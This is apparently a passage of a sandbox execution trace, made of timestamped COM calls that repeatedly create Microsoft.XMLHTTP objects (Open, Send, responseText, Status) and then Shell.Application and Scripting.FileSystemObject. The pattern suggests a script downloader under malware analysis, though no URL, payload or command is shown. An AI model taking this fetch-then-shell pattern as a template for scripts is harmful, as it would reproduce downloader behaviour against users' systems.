	[0260.727] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0260.727] XMLHTTPRequest:IUnknown:Release (This=0x49c5aa8) returned 0x0
	[0260.727] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0260.727] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0260.727] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0260.727] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0260.727] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0260.727] longjmp () 
	[0260.727] longjmp () 
	[0260.727] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0260.727] SysStringLen (param_1=0x0) returned 0x0
	[0260.727] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0260.728] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0260.728] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7750) returned 0x0
	[0260.728] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0260.728] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7750, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c77b8) returned 0x0
	[0260.728] ??2@YAPEAX_K@Z () returned 0x62f330
	[0260.728] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c77b8, pUnkSite=0x62f330) 
	[0260.728] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0260.728] XMLHTTPRequest:IUnknown:Release (This=0x49c77b8) returned 0x0
	[0260.728] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7750, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7750) returned 0x0
	[0260.728] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7750) returned 0x3
	[0260.728] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7750, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0260.728] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7750, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0260.728] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7750, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0260.728] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7750, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0260.728] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7750, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0260.728] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7750, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0262.148] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7750, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0262.148] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7750, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0262.148] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7750, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0262.149] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7750, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0262.149] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7750, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0262.149] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7750, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0262.149] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0262.149] SysStringLen (param_1=0x0) returned 0x0
	[0262.149] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0262.149] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0262.149] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0262.149] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0262.149] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0262.149] ??2@YAPEAX_K@Z () returned 0x62f350
	[0262.149] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0262.149] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0262.149] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0262.149] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0262.150] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0262.150] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0262.150] SysStringLen (param_1=0x0) returned 0x0
	[0262.150] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0262.152] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0262.152] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0262.152] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0262.152] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0262.152] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0262.152] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0262.893] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7750, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0262.893] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7750, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0262.893] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7750, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0262.894] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0262.894] SysStringLen (param_1=0x0) returned 0x0
	[0262.894] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0262.894] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0262.895] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7750) returned 0x0
	[0262.895] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0262.895] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7750, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5aa8) returned 0x0
	[0262.895] ??2@YAPEAX_K@Z () returned 0x62f330
	[0262.895] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5aa8, pUnkSite=0x62f330) 
	[0262.895] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0262.895] XMLHTTPRequest:IUnknown:Release (This=0x49c5aa8) returned 0x0
	[0262.895] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7750, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7750) returned 0x0
	[0262.895] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7750) returned 0x3
	[0262.895] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7750, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0262.895] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7750, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0262.897] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7750, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0262.897] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0262.897] SysStringLen (param_1=0x0) returned 0x0
	[0262.897] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0262.897] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0262.897] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c77b0) returned 0x0
	[0262.897] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0262.897] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7818) returned 0x0
	[0262.897] ??2@YAPEAX_K@Z () returned 0x62f310
	[0262.897] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7818, pUnkSite=0x62f310) 
	[0262.897] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0262.897] XMLHTTPRequest:IUnknown:Release (This=0x49c7818) returned 0x0
	[0262.897] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c77b0) returned 0x0
	[0262.897] XMLHTTPRequest:IUnknown:AddRef (This=0x49c77b0) returned 0x3
	[0262.898] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0262.898] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c77b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0262.898] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0262.898] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0262.898] SysStringLen (param_1=0x0) returned 0x0
	[0262.898] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0262.898] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0262.898] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0262.898] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0262.898] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c28) returned 0x0
	[0262.898] ??2@YAPEAX_K@Z () returned 0x62f330
	[0262.898] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c28, pUnkSite=0x62f330) 
